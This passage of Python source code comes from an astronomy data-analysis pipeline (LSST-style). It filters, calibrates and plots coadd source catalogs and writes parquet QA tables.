Set boolean array indicating sources deemed unsuitable for qa\n # analyses.\n badUnforced = makeBadArray(unforced, onlyReadStars=self.config.onlyReadStars)\n if haveForced:\n badForced = makeBadArray(forced, onlyReadStars=self.config.onlyReadStars)\n badCombined = (badUnforced | badForced)\n unforcedMatched = unforced[~badCombined].copy(deep=True)\n forcedMatched = forced[~badCombined].copy(deep=True)\n\n if self.config.doPlotCompareUnforced:\n plotList.append(self.plotCompareUnforced(forcedMatched, unforcedMatched, plotInfoDict,\n areaDict, highlightList=highlightList,\n **plotKwargs))\n\n if repoInfo.isGen3: # Add back in filter to dataId so gen2 templates work for putting.\n repoInfo.dataId[\"filter\"] = repoInfo.dataId[\"physical_filter\"]\n # Create and write parquet tables\n if self.config.doWriteParquetTables:\n if haveForced:\n # Add pre-computed columns for parquet tables\n forced = addPreComputedColumns(forced, fluxToPlotList=self.config.fluxToPlotList,\n toMilli=self.config.toMilli, unforcedCat=unforced)\n if repoInfo.isGen3:\n dataRef_forced = butlerGen2.dataRef(\"analysisCoaddTable_forced\",\n dataId=repoInfo.dataId)\n else:\n dataRef_forced = repoInfo.butler.dataRef(\"analysisCoaddTable_forced\",\n dataId=repoInfo.dataId)\n writeParquet(dataRef_forced, forced, badArray=badForced)\n if repoInfo.isGen3:\n dataRef_unforced = butlerGen2.dataRef(\"analysisCoaddTable_unforced\",\n dataId=repoInfo.dataId)\n else:\n dataRef_unforced = repoInfo.butler.dataRef(\"analysisCoaddTable_unforced\",\n dataId=repoInfo.dataId)\n # Add pre-computed columns for parquet tables\n unforced = addPreComputedColumns(unforced, fluxToPlotList=self.config.fluxToPlotList,\n toMilli=self.config.toMilli)\n writeParquet(dataRef_unforced, unforced, badArray=badUnforced)\n if self.config.writeParquetOnly and not self.config.doPlotMatches:\n self.log.info(\"Exiting after writing Parquet tables. No plots generated.\")\n return\n\n if not self.config.writeParquetOnly:\n # Purge the catalogs of flagged sources\n unforced = unforced[~badUnforced].copy(deep=True)\n if haveForced:\n forced = forced[~badForced].copy(deep=True)\n else:\n forced = unforced\n self.catLabel = \" scarlet\" if \"deblend_scarletFlux\" in unforcedSchema else \" nChild = 0\"\n strIndex = forcedStr.find(\"\\n\")\n if strIndex < 0:\n forcedStr = forcedStr + self.catLabel\n else:\n forcedStr = forcedStr[:strIndex] + \" \" + self.catLabel + forcedStr[strIndex:]\n if haveForced:\n self.log.info(\"\\nNumber of sources in catalogs: unforced = {0:d} and forced = {1:d}\".\n format(len(unforced), len(forced)))\n else:\n self.log.info(\"\\nNumber of sources in catalog: unforced = {0:d}\".format(len(unforced)))\n\n if self.config.doPlotPsfFluxSnHists:\n plotList.append(self.plotPsfFluxSnHists(unforced, \"base_PsfFlux_cal\", plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n **plotKwargs))\n if self.config.doPlotSkyObjects:\n plotList.append(self.plotSkyObjects(skyObjCat, \"skyObjects\", plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\")))\n if self.config.doPlotSkyObjectsSky:\n plotList.append(self.plotSkyObjectsSky(skyObjCatAll, \"skyObjects\", plotInfoDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n alpha=0.7, doPlotTractImage=True,\n doPlotPatchOutline=True, sizeFactor=3.0,\n maxDiamPix=1000))\n\n if self.config.doPlotFootprintArea:\n if \"base_FootprintArea_value\" in unforcedSchema:\n plotList.append(self.plotFootprintHist(unforced, \"footArea\", plotInfoDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n **plotKwargs))\n plotList.append(self.plotFootprint(unforced, plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n highlightList=highlightList, **plotKwargs))\n else:\n self.log.info(\"config.doPlotFootprintArea is True, but do not have \"\n \"base_FootprintArea_value in schema...skipping footArea plots.\")\n\n if self.config.doPlotRhoStatistics:\n plotList.append(self.plotRhoStatistics(unforced, plotInfoDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n **plotKwargs))\n\n if self.config.doPlotQuiver:\n plotList.append(self.plotQuiver(unforced, \"ellipResids\", plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n scale=2, **plotKwargs))\n\n if self.config.doPlotInputCounts:\n plotList.append(self.plotInputCounts(unforced, \"inputCounts\", plotInfoDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n alpha=0.5, doPlotPatchOutline=True, sizeFactor=5.0,\n maxDiamPix=1000, **plotKwargs))\n\n plotKwargs.update(dict(highlightList=highlightList))\n if self.config.doPlotMags:\n plotList.append(self.plotMags(unforced, plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n postFix=\"_unforced\", **plotKwargs))\n if haveForced:\n plotKwargs.update(dict(highlightList=highlightList\n + [(\"merge_measurement_\" + repoInfo.genericBandName, 0,\n \"yellow\")]))\n fluxToPlotList = [flux for flux in self.config.fluxToPlotList]\n for gaapFlux in self.config.gaapFluxList:\n haveGaap = gaapFlux + \"_instFlux\" in forcedSchema\n if haveGaap:\n fluxToPlotList.append(gaapFlux)\n plotList.append(self.plotMags(forced, plotInfoDict, areaDict, forcedStr=forcedStr,\n fluxToPlotList=fluxToPlotList, postFix=\"_forced\",\n **plotKwargs))\n plotKwargs.update(dict(highlightList=highlightList))\n\n if self.config.doPlotStarGalaxy:\n if \"ext_shapeHSM_HsmSourceMoments_xx\" in unforcedSchema:\n plotList.append(self.plotStarGal(unforced, plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n **plotKwargs))\n else:\n self.log.warning(\"Cannot run plotStarGal: ext_shapeHSM_HsmSourceMoments_xx not \"\n \"in forcedSchema\")\n\n if self.config.doPlotSizes:\n if all(ss in unforcedSchema for ss in [\"base_SdssShape_psf_xx\", \"calib_psf_used\"]):\n plotList.append(self.plotSizes(unforced, plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n postFix=\"_unforced\", **plotKwargs))\n else:\n self.log.warning(\"Cannot run plotSizes: base_SdssShape_psf_xx and/or calib_psf_used \"\n \"not in unforcedSchema\")\n if haveForced:\n if all(ss in forcedSchema for ss in [\"base_SdssShape_psf_xx\", \"calib_psf_used\"]):\n plotList.append(self.plotSizes(forced, plotInfoDict, areaDict,\n forcedStr=forcedStr, **plotKwargs))\n else:\n self.log.warning(\"Cannot run plotSizes: base_SdssShape_psf_xx and/or calib_psf_used \"\n \"not in forcedSchema\")\n if cosmos:\n plotList.append(self.plotCosmos(forced, plotInfoDict, areaDict, cosmos, repoInfo.dataId))\n\n # Haven't got reference catalog loading working for a gen3 repo...\n if (self.config.doPlotMatches or self.config.doWriteParquetTables) and not repoInfo.isGen3:\n matchAreaDict = {}\n # First write out unforced match parquet tables\n astromMatches, matchAreaDict = self.readSrcMatches(\n repoInfo, patchRefExistsList, self.config.coaddName + \"Coadd_meas\",\n self.config.astromRefObjLoader, aliasDictList=aliasDictList, haveForced=False)\n unpackedMatches = None\n self.zpLabelPacked = self.zpLabel\n photomMatches, matchAreaDict = self.readSrcMatches(\n repoInfo, patchRefExistsList, self.config.coaddName + \"Coadd_meas\",\n self.config.photomRefObjLoader, aliasDictList=aliasDictList, haveForced=False)\n qaTableSuffix = \"_unforced\"\n if self.config.doWriteParquetTables:\n for calibType, calibMatches in [(\"Astrom\", astromMatches), (\"Photom\", photomMatches)]:\n matchesDataRef = repoInfo.butler.dataRef(\n \"analysis\" + calibType + \"MatchFullRefCoaddTable\" + qaTableSuffix,\n dataId=repoInfo.dataId)\n writeParquet(matchesDataRef, calibMatches, badArray=None, prefix=\"src_\")\n # Now write out forced match parquet tables, if present\n if haveForced:\n astromMatches, astromMatchAreaDict = self.readSrcMatches(\n repoInfo, patchRefExistsList, self.config.coaddName + \"Coadd_forced_src\",\n self.config.astromRefObjLoader, aliasDictList=aliasDictList, haveForced=haveForced)\n photomMatches, photomMatchAreaDict = self.readSrcMatches(\n repoInfo, patchRefExistsList, self.config.coaddName + \"Coadd_forced_src\",\n self.config.photomRefObjLoader, aliasDictList=aliasDictList, haveForced=haveForced)\n qaTableSuffix = \"_forced\"\n if self.config.doWriteParquetTables:\n for calibType, calibMatches in [(\"Astrom\", astromMatches), (\"Photom\", photomMatches)]:\n matchesDataRef = repoInfo.butler.dataRef(\n \"analysis\" + calibType + \"MatchFullRefCoaddTable\" + qaTableSuffix,\n dataId=repoInfo.dataId)\n writeParquet(matchesDataRef, calibMatches, badArray=None, prefix=\"src_\")\n\n if self.config.writeParquetOnly:\n self.log.info(\"Exiting after writing Parquet tables. No plots generated.\")\n return\n\n if self.config.doPlotMatches:\n plotKwargs.update(dict(zpLabel=self.zpLabel))\n matchHighlightList = [\n (\"src_\" + self.config.analysis.fluxColumn.replace(\"_instFlux\", \"_flag\"), 0,\n \"turquoise\"), (\"src_deblend_nChild\", 0, \"lime\")]\n for ih, flagName in enumerate(list(self.config.analysis.flags)):\n flagName = \"src_\" + flagName\n if not any(flagName in highlight for highlight in matchHighlightList):\n matchHighlightList += [(flagName, 0, FLAGCOLORS[ih%len(FLAGCOLORS)]), ]\n plotKwargs.update(dict(highlightList=matchHighlightList, matchRadius=self.matchRadius,\n matchRadiusUnitStr=self.matchRadiusUnitStr))\n matchLabel = \"matched to\\n\" + self.config.astromRefObjLoader.ref_dataset_name\n matchLabel = matchLabel + \"\\n (noApCorr)\" if self.config.doBackoutApCorr else matchLabel\n plotList.append(self.plotAstromMatches(\n astromMatches, plotInfoDict, astromMatchAreaDict, self.config.astromRefObjLoader,\n unpackedMatches=unpackedMatches, forcedStr=matchLabel, **plotKwargs))\n matchLabel = \"matched to\\n\" + self.config.photomRefObjLoader.ref_dataset_name\n matchLabel = matchLabel + \"\\n (noApCorr)\" if self.config.doBackoutApCorr else matchLabel\n plotList.append(self.plotPhotomMatches(\n photomMatches, plotInfoDict, photomMatchAreaDict, self.config.photomRefObjLoader,\n forcedStr=matchLabel, **plotKwargs))\n\n for cat in self.config.externalCatalogs:\n with andCatalog(cat):\n matches = self.matchCatalog(forced, repoInfo.filterName,\n self.config.externalCatalogs[cat])\n if matches is not None:\n matchLabel = \"matched to\\n\" + self.config.externalCatalogs[cat]\n plotList.append(self.plotMatches(matches, plotInfoDict, matchAreaDict,\n forcedStr=matchLabel, **plotKwargs))\n else:\n self.log.warning(\"Could not create match catalog for {:}. Is \"\n \"lsst.meas.extensions.astrometryNet setup?\".format(cat))\n\n if not repoInfo.isGen3:\n self.allStats, self.allStatsHigh = savePlots(plotList, \"plotCoadd\", repoInfo.dataId,\n repoInfo.butler, subdir=subdir)\n else:\n self.allStats, self.allStatsHigh = savePlots(plotList, \"plotCoadd\", repoInfo.dataId,\n butlerGen2, subdir=subdir)\n\n metaDict = {kk: plotInfoDict[kk] for kk in (\"filter\", \"tract\", \"rerun\")\n if plotInfoDict[kk] is not None}\n if plotInfoDict[\"cameraName\"]:\n metaDict[\"camera\"] = plotInfoDict[\"cameraName\"]\n self.verifyJob = updateVerifyJob(self.verifyJob, metaDict=metaDict, specsList=None)\n # TODO: DM-26758 (or DM-14768) should make the following lines a proper\n # butler.put by directly persisting json files.\n if not repoInfo.isGen3:\n verifyJobFilename = repoInfo.butler.get(\"coaddAnalysis_verify_job_filename\",\n dataId=repoInfo.dataId)[0]\n else:\n verifyJobFilename = butlerGen2.get(\"coaddAnalysis_verify_job_filename\", dataId=repoInfo.dataId)[0]\n self.verifyJob.write(verifyJobFilename)\n\n def readParquetTables(self, dataRefList, dataset, repoInfo, dfDataset=None,\n doApplyExternalPhotoCalib=False, doApplyExternalSkyWcs=False, useMeasMosaic=False,\n iCat=None):\n \"\"\"Read in, calibrate, and concatenate parquet tables from a list of\n dataRefs.\n\n The calibration performed is based on config parameters. For coadds,\n the only option is the calibration zeropoint. For visits, the options\n include external calibrations for both photometry (e.g. fgcm) and wcs\n (e.g. jointcal) or simply the zero point from single frame processing.\n\n Parameters\n ----------\n dataRefList : `list` of\n `lsst.daf.persistence.butlerSubset.ButlerDataRef`\n A list of butler data references whose catalogs of ``dataset``\n are to be read in. NOTE: if the filter under consideration does\n not exist in the coadd obj parquet table for any given patch,\n that patch will be removed in place from this list.\n dataset : `str`\n Name of the catalog ``dataset`` to be read in, e.g.\n \"deepCoadd_obj\" (for coadds) or \"source\" (for visits).\n repoInfo : `lsst.pipe.base.struct.Struct`\n A struct containing elements with repo information needed to\n determine if the catalog data is coadd or visit level and, if the\n latter, to create appropriate dataIds to look for the external\n calibration datasets.\n dfDataset : `str` or `None`, optional\n Name of the dataFrame \\\"dataset\\\" to be read in for multilevel\n parquet tables. For coadd catalogs, which are of type\n `lsst.pipe.tasks.parquetTable.MultilevelParquetTable`, this is\n actually not optional but must be one of, \"forced_src\", \"meas\", or\n \"ref\". This parameter is not relevant for visit-level catalogs,\n which are of type `lsst.pipe.tasks.parquetTable.ParquetTable`.\n doApplyExternalPhotoCalib : `bool`, optional\n If `True`: Apply the external photometric calibrations specified by\n ``repoInfo.photoCalibDataset`` to the catalog.\n If `False`: Apply the ``fluxMag0`` photometric calibration from\n Single Frame Measuerment to the catalog.\n doApplyExternalSkyWcs : `bool`, optional\n If `True`: Apply the external astrometric calibrations specified by\n ``repoInfo.skyWcsDataset`` the catalog.\n If `False`: Retain the WCS from Single Frame Measurement.\n useMeasMosaic : `bool`, optional\n Use meas_mosaic's applyMosaicResultsCatalog for the external\n calibration (even if photoCalib object exists). For testing\n implementations.\n iCat : `int` or `None,` optional\n Integer representing whether this is comparison catalog 0 or 1.\n\n Raises\n ------\n TaskError\n If no data is read in for the ``dataRefList``.\n RuntimeError\n If catalog is of type\n `lsst.pipe.tasks.parquetTable.MultilevelParquetTable` but no\n ``dfDataset`` is provided.\n\n Returns\n -------\n allCats : `pandas.core.frame.DataFrame`\n The concatenated catalogs as a pandas DataFrame.\n \"\"\"\n # It is much faster to concatenate a list of DataFrames than to\n # concatenate successively within the for loop.\n commonZpCatList = []\n catList = []\n colsToLoadList = None\n dfLoadColumns = None\n refColsToLoadList = None\n measColsToLoadList = None\n dataRefToRemoveList = []\n parquetCat = None\n isMulti = False\n for dataRef in dataRefList:\n dataId = dataRef[\"dataId\"] if repoInfo.isGen3 else dataRef.dataId\n if not repoInfo.isGen3:\n if not dataRef.datasetExists(dataset):\n self.log.info(\"Dataset does not exist: {}, {}\".format(dataId, dataset))\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(dataset, dataId=dataId)\n except LookupError:\n continue\n\n if not repoInfo.isGen3:\n parquetCat = dataRef.get(dataset, immediate=True)\n else:\n butler = dataRef[\"butler\"]\n parquetCat = butler.get(dataset, dataId=dataId, immediate=True)\n isMulti = (isinstance(parquetCat, MultilevelParquetTable)\n or isinstance(parquetCat.columns, pd.MultiIndex))\n if isMulti and not any(dfDataset == dfName for dfName in [\"forced_src\", \"meas\", \"ref\"]):\n raise RuntimeError(\"Must specify a dfDataset for multilevel parquet tables\")\n bandName = repoInfo.genericBandName\n filterLevelStr = \"band\"\n physicalFilterStr = \"physical_filter\" if repoInfo.isGen3 else \"filter\"\n\n if isMulti:\n if isinstance(parquetCat.columns, pd.MultiIndex):\n existsBandList = parquetCat.columns.levels[1]\n elif isinstance(parquetCat, MultilevelParquetTable):\n existsBandList = parquetCat.columnLevelNames[\"band\"]\n else:\n existsBandList = None\n\n if isMulti and existsBandList is not None:\n # Some obj tables do not contain data for all filters\n if bandName not in existsBandList:\n self.log.info(\"Filter {} does not exist for: {}, {}. Skipping patch...\".\n format(dataId[physicalFilterStr], dataId, dataset))\n dataRefToRemoveList.append(dataRef)\n continue\n\n if dfLoadColumns is None and isMulti:\n dfLoadColumns = {\"dataset\": dfDataset, filterLevelStr: bandName}\n\n # On the first dataRef read in, create list of columns to load\n # based on config lists and their existence in the catalog table.\n if colsToLoadList is None:\n catColumns = getParquetColumnsList(parquetCat, dfDataset=dfDataset, filterName=bandName)\n colsToLoadList = [col for col in catColumns if\n (col.startswith(tuple(self.config.baseColStrList))\n and not any(s in col for s in self.config.notInColStrList))]\n if dfLoadColumns is None:\n dfLoadColumns = colsToLoadList\n else:\n dfLoadColumns.update(column=colsToLoadList)\n if isMulti:\n if hasattr(parquetCat, \"toDataFrame\"):\n cat = parquetCat.toDataFrame(columns=dfLoadColumns)\n else:\n parametersDict = {\"columns\": dfLoadColumns}\n cat = butler.get(dataset, dataId=dataId, parameters=parametersDict)\n cat = cat[dfDataset][bandName].copy()\n else:\n if hasattr(parquetCat, \"toDataFrame\"):\n cat = parquetCat.toDataFrame(columns=dfLoadColumns)\n else:\n cat = parquetCat[dfLoadColumns].copy()\n cat = addElementIdColumn(cat, dataId, repoInfo=repoInfo)\n if dfDataset == \"forced_src\": # insert some columns from the ref and meas cats for forced cats\n if refColsToLoadList is None:\n refColumns = getParquetColumnsList(parquetCat, dfDataset=\"ref\", filterName=bandName)\n refColsToLoadList = [col for col in refColumns if\n (col.startswith(tuple(self.config.columnsToCopyFromRef))\n and not any(s in col for s in self.config.notInColStrList)\n and not any(s in col for s in colsToLoadList))]\n refLoadDict = {\"dataset\": \"ref\", filterLevelStr: bandName, \"column\": refColsToLoadList}\n if hasattr(parquetCat, \"toDataFrame\"):\n ref = parquetCat.toDataFrame(columns=refLoadDict)\n else:\n parametersDict = {\"columns\": refLoadDict}\n ref = butler.get(dataset, dataId=dataRef[\"dataId\"], parameters=parametersDict)\n ref = ref[\"ref\"][bandName]\n cat = pd.concat([cat, ref], axis=1)\n if measColsToLoadList is None:\n measColumns = getParquetColumnsList(parquetCat, dfDataset=\"meas\", filterName=bandName)\n measColsToLoadList = [col for col in measColumns if\n (col.startswith(tuple(self.config.columnsToCopyFromMeas))\n and not any(s in col for s in self.config.notInColStrList)\n and not any(s in col for s in colsToLoadList)\n and not any(s in col for s in refColsToLoadList))]\n measLoadDict = {\"dataset\": \"meas\", filterLevelStr: bandName, \"column\": measColsToLoadList}\n if hasattr(parquetCat, \"toDataFrame\"):\n meas = parquetCat.toDataFrame(columns=measLoadDict)\n else:\n parametersDict = {\"columns\": measLoadDict}\n meas = butler.get(dataset, dataId=dataRef[\"dataId\"], parameters=parametersDict)\n meas = meas[\"meas\"][bandName]\n\n cat = pd.concat([cat, meas], axis=1)\n\n if \"patch\" in dataId: # This is a coadd catalog\n cat = self.calibrateCatalogs(cat, wcs=repoInfo.wcs)\n catList.append(cat)\n else: # This is a visit catalog\n # Scale fluxes to common zeropoint to make basic comparison\n # plots without calibrated ZP influence.\n commonZpCat = cat.copy(True)\n commonZpCat = calibrateSourceCatalog(commonZpCat, self.config.analysis.commonZp)\n if doApplyExternalPhotoCalib:\n if not repoInfo.isGen3:\n if not dataRef.datasetExists(repoInfo.photoCalibDataset):\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.photoCalibDataset))\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(repoInfo.photoCalibDataset, dataId=dataRef[\"dataId\"])\n except LookupError:\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.photoCalibDataset))\n continue\n if doApplyExternalSkyWcs:\n if not repoInfo.isGen3:\n if not dataRef.datasetExists(repoInfo.skyWcsDataset):\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.skyWcsDataset))\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(repoInfo.skyWcsDataset, dataId=dataId)\n except LookupError:\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.skyWcsDataset))\n continue\n fluxMag0 = None\n if not doApplyExternalPhotoCalib:\n photoCalib = repoInfo.butler.get(\"calexp\" + repoInfo.delimiterStr + \"photoCalib\", dataId)\n fluxMag0 = photoCalib.getInstFluxAtZeroMagnitude()\n cat = self.calibrateCatalogs(dataRef, cat, fluxMag0, repoInfo, doApplyExternalPhotoCalib,\n doApplyExternalSkyWcs, useMeasMosaic, iCat=iCat)\n catList.append(cat)\n commonZpCatList.append(commonZpCat)\n\n # Remove any non-existent patches from dataRefList\n for dataRef in dataRefToRemoveList:\n dataRefList.remove(dataRef)\n\n if not catList:\n raise TaskError(\"No catalogs read: %s\" % ([dataId for dataRef in dataRefList]))\n allCats = pd.concat(catList, axis=0)\n # The object \"id\" is associated with the dataframe index. Add a\n # column that is the id so that it is available for operations on it,\n # e.g. cat[\"id\"].\n allCats[\"id\"] = allCats.index\n # Optionally backout aperture corrections\n if self.config.doBackoutApCorr:\n allCats = backoutApCorr(allCats)\n if commonZpCatList:\n allCommonZpCats = pd.concat(commonZpCatList, axis=0)\n allCommonZpCats[\"id\"] = allCommonZpCats.index\n if self.config.doBackoutApCorr:\n allCommonZpCats = backoutApCorr(allCommonZpCats)\n else:\n allCommonZpCats = None\n return allCats, allCommonZpCats\n\n def readAfwCoaddTables(self, dataRefList, repoInfo, haveForced, aliasDictList=None):\n \"\"\"Read in, concatenate, calibrate, and convert to DataFrame a list of\n coadd catalogs that were persisted as afwTables.\n\n This function delegates to readCatalogs for the actual catalog reading\n and concatenating, in which an extra column indicating the patch ID is\n added to each catalog before appending them all to a single list. This\n is useful for any subsequent QA analysis using the persisted parquet\n files. Here these catalogs are calibrated, have useful columns copied\n from the *Coadd_ref to *Coadd_forced_src catalogs, and are converted\n to pandas DataFrames.\n\n Parameters\n ----------\n dataRefList : `list` of\n `lsst.daf.persistence.butlerSubset.ButlerDataRef`\n A `list` of butler data references whose coadd catalogs are to be\n read in.\n repoInfo : `lsst.pipe.base.Struct`\n A struct containing relevant information about the repository under\n study. Elements used here include the dataset names for any\n external calibrations to be applied.\n haveForced : `bool`\n A boolean indicating if a forced_src catalog exists in the\n repository associated with ``repoInfo``.\n aliasDictList : `dict` or `None`, optional\n A `dict` of alias columns to add for backwards compatibility with\n old repositories.\n\n Raises\n ------\n RuntimeError\n If lengths of *Coadd_forced_src and *Coadd_ref catalogs are not\n equal.\n\n Returns\n -------\n result : `lsst.pipe.base.Struct`\n A struct with attributes:\n ``unforced``\n The concatenated unforced, or \"_meas\", calibrated catalog\n (`pandas.core.frame.DataFrame`).\n ``forced``\n The concatenated forced, or \"_forced_src\", calibrated catalog\n (`pandas.core.frame.DataFrame`).\n ``areaDict``\n Contains patch keys that index the patch corners in RA/Dec and\n the effective patch area (i.e. neither the \"BAD\" nor \"NO_DATA\"\n mask bit is set) (`dict`).\n \"\"\"\n if haveForced:\n forcedCatStruct = self.readCatalogs(dataRefList, self.config.coaddName + \"Coadd_forced_src\",\n repoInfo, aliasDictList=aliasDictList,\n readFootprintsAs=self.config.readFootprintsAs)\n forced = forcedCatStruct.catalog\n areaDict = forcedCatStruct.areaDict\n forced = self.calibrateCatalogs(forced, wcs=repoInfo.wcs)\n forcedSchema = getSchema(forced)\n else:\n forced = None\n unforcedCatStruct = self.readCatalogs(dataRefList, self.config.coaddName + \"Coadd_meas\", repoInfo,\n aliasDictList=aliasDictList,\n readFootprintsAs=self.config.readFootprintsAs)\n unforced = unforcedCatStruct.catalog\n unforced = self.calibrateCatalogs(unforced, wcs=repoInfo.wcs)\n unforcedSchema = getSchema(unforced)\n if not haveForced:\n areaDict = unforcedCatStruct.areaDict\n if haveForced:\n # Copy over some fields from _ref and _meas catalogs to\n # _forced_src catalog.\n refCat = self.readCatalogs(dataRefList, self.config.coaddName + \"Coadd_ref\", repoInfo).catalog\n if len(forced) != len(refCat):\n raise RuntimeError((\"Lengths of forced (N = {:d}) and ref (N = {:d}) cats \"\n \"don't match\").format(len(forced), len(refCat)))\n refCatSchema = getSchema(refCat)\n refColList = []\n for strPrefix in self.config.columnsToCopyFromRef:\n refColList.extend(refCatSchema.extract(strPrefix + \"*\"))\n refColsToCopy = [col for col in refColList if col not in forcedSchema\n and not any(s in col for s in self.config.notInColStrList)\n and col in refCatSchema\n and not (repoInfo.hscRun and col == \"slot_Centroid_flag\")]\n forced = addColumnsToSchema(refCat, forced, refColsToCopy)\n measColList = []\n for strPrefix in self.config.columnsToCopyFromMeas:\n measColList.extend(refCatSchema.extract(strPrefix + \"*\"))\n measColsToCopy = [col for col in measColList if col not in forcedSchema\n and not any(s in col for s in self.config.notInColStrList)\n and col in unforcedSchema\n and not (repoInfo.hscRun and col == \"slot_Centroid_flag\")]\n forced = addColumnsToSchema(unforced, forced, measColsToCopy)\n\n # Convert to pandas DataFrames\n unforced = unforced.asAstropy().to_pandas().set_index(\"id\", drop=False)\n if haveForced:\n forced = forced.asAstropy().to_pandas().set_index(\"id\", drop=False)\n return Struct(unforced=unforced, forced=forced, areaDict=areaDict)\n\n def readCatalogs(self, dataRefList, dataset, repoInfo, aliasDictList=None, fakeCat=None,\n raFakesCol=\"raJ2000\", decFakesCol=\"decJ2000\", readFootprintsAs=None,\n doApplyExternalPhotoCalib=False, doApplyExternalSkyWcs=False, useMeasMosaic=False,\n iCat=None):\n \"\"\"Read in and concatenate catalogs of type dataset in lists of\n data references.\n\n An extra column indicating the patch ID is added to each catalog before\n appending them all to a single list. This is useful for any subsequent\n QA analysis using the persisted parquet files.\n\n Parameters\n ----------\n dataRefList : `list` of\n `lsst.daf.persistence.butlerSubset.ButlerDataRef`\n A list of butler data references whose catalogs of dataset type are\n to be read in.\n dataset : `str`\n Name of the catalog dataset to be read in.\n repoInfo : `lsst.pipe.base.Struct`\n A struct containing relevant information about the repository under\n study. Elements used here include the dataset names for any\n external calibrations to be applied.\n aliasDictList : `dict` or `None`, optional\n A `dict` of alias columns to add for backwards compatibility with\n old repositories.\n fakeCat : `pandas.core.frame.DataFrame` or `None`, optional\n Catalog of fake sources, used if hasFakes is `True` in which case a\n column (onPatch) is added with the patch number if the fake source\n overlaps a ccd and `np.nan` if it does not.\n raFakesCol : `str`, optional\n The name of the RA column to use from the fakes catalogue.\n decFakesCol : `str`, optional\n The name of the Dec column to use from the fakes catalogue.\n readFootprintsAs : `None` or `str`, optional\n A string dictating if and what type of Footprint to read in along\n with the catalog:\n `None` : do not read in Footprints.\n \"light\": read in regular Footprints (include SpanSet and list of\n peaks per Footprint).\n \"heavy\": read in HeavyFootprints (include regular Footprint plus\n flux values per Footprint).\n doApplyExternalPhotoCalib : `bool`, optional\n If `True`: Apply the external photometric calibrations specified by\n ``repoInfo.photoCalibDataset`` to the catalog.\n If `False`: Apply the ``fluxMag0`` photometric calibration from\n Single Frame Measuerment to the catalog.\n doApplyExternalSkyWcs : `bool`, optional\n If `True`: Apply the external astrometric calibrations specified by\n ``repoInfo.skyWcsDataset`` the calalog.\n If `False`: Retain the WCS from Single Frame Measurement.\n useMeasMosaic : `bool`, optional\n Use meas_mosaic's applyMosaicResultsCatalog for the external\n calibration (even if photoCalib object exists). For testing\n implementations.\n iCat : `int` or `None,` optional\n Integer representing whether this is comparison catalog 0 or 1.\n\n Raises\n ------\n TaskError\n If no data is read in for the dataRefList.\n RuntimeError\n If entry for ``readFootprintsAs`` is not recognized (i.e. not one\n of `None`, \\\"light\\\", or \\\"heavy\\\").\n\n Returns\n -------\n result : `lsst.pipe.base.Struct`\n A struct with attributes:\n ``commonZpCatalog``\n The concatenated common zeropoint calibrated catalog\n (`lsst.afw.table.SourceCatalog` or `None` for coadd data).\n ``catalog``\n The concatenated SFM or external calibration calibrated catalog\n (`lsst.afw.table.SourceCatalog`).\n ``areaDict``\n Contains patch keys that index the patch corners in RA/Dec and\n the effective patch area (i.e. neither the \"BAD\" nor \"NO_DATA\"\n mask bit is set) (`dict`).\n ``fakeCat``\n The updated catalog of fake sources (None if the config\n parameter hasFakes = `False` (`pandas.core.frame.DataFrame`).\n \"\"\"\n commonZpCatList = []\n catList = []\n dataRefExistsList = []\n if not repoInfo.isGen3:\n for dataRef in dataRefList:\n if dataRef.datasetExists(dataset):\n dataRefExistsList.append(dataRef)\n else:\n for dataRef in dataRefList:\n dataId = dataRef[\"dataId\"]\n try:\n repoInfo.butler.getURI(dataset, dataId=dataId)\n dataRefExistsList.append(dataRef)\n except LookupError:\n print(\"No URI for \", dataId)\n calexpPrefix = dataset[:dataset.find(\"_\")] if \"_\" in dataset else \"\"\n try:\n areaDict, fakeCat = computeAreaDict(repoInfo, dataRefExistsList, dataset=calexpPrefix,\n fakeCat=fakeCat, raFakesCol=raFakesCol,\n decFakesCol=decFakesCol)\n except (RuntimeError, AttributeError):\n areaDict, fakeCat = None, None\n for dataRef in dataRefExistsList:\n if not readFootprintsAs:\n catFlags = afwTable.SOURCE_IO_NO_FOOTPRINTS\n elif readFootprintsAs == \"light\":\n catFlags = afwTable.SOURCE_IO_NO_HEAVY_FOOTPRINTS\n elif readFootprintsAs == \"heavy\":\n catFlags = 0\n else:\n raise RuntimeError(\"Unknown entry for readFootprintsAs: {:}. Only recognize one of: \"\n \"None, \\\"light\\\", or \\\"heavy\\\"\".format(readFootprintsAs))\n dataId = dataRef[\"dataId\"] if repoInfo.isGen3 else dataRef.dataId\n if not repoInfo.isGen3:\n cat = dataRef.get(dataset, immediate=True, flags=catFlags)\n else:\n butler = dataRef[\"butler\"]\n cat = butler.get(dataset, dataId=dataId, immediate=True, flags=catFlags)\n # Optionally backout aperture corrections\n if self.config.doBackoutApCorr:\n cat = backoutApCorr(cat)\n schema = getSchema(cat)\n # Old catalogs did not have base_FootprintArea_value so, for\n # backwards compatibility, check if present and add if not.\n if (self.config.doPlotFootprintArea and \"base_FootprintArea_value\" not in schema\n and len(schema.extract(\"merge_footprint*\")) > 0): # to not bother for forced cats\n if self.config.readFootprintsAs != \"heavy\":\n self.log.warning(\"config.doPlotFootprintArea is True, but do not have \"\n \"base_FootprintArea_value in schema. If reading in an older afw \"\n \"src catalog, may need to run with 